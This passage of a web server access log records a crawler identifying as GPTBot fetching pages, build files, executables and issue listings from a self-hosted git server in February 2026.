192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" -[17/Feb/2026:18:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 10958571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" -[17/Feb/2026:18:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 10962886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" -[17/Feb/2026:18:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 1021] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" -[17/Feb/2026:18:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11384] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:18:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11748] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:18:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11385] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" -[17/Feb/2026:18:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11749] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:18:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16073] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:18:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11671] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:18:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11751] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:18:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16075] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:18:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11673] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:18:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11750] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:18:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11320] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16080] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:18:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11669] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:18:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11323] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:23:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11749] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" -[17/Feb/2026:18:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:18:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/ui_main.cpython-312.pyc" -[17/Feb/2026:18:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11066] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=all&type=all" -[17/Feb/2026:18:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=all&type=all" -[17/Feb/2026:18:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec?display=source" [Client 74.7.227.38] [Length 12452] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:18:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16073] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" -[17/Feb/2026:18:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11670] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" -[17/Feb/2026:18:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11321] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11321] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" -[17/Feb/2026:18:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" -[17/Feb/2026:18:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr 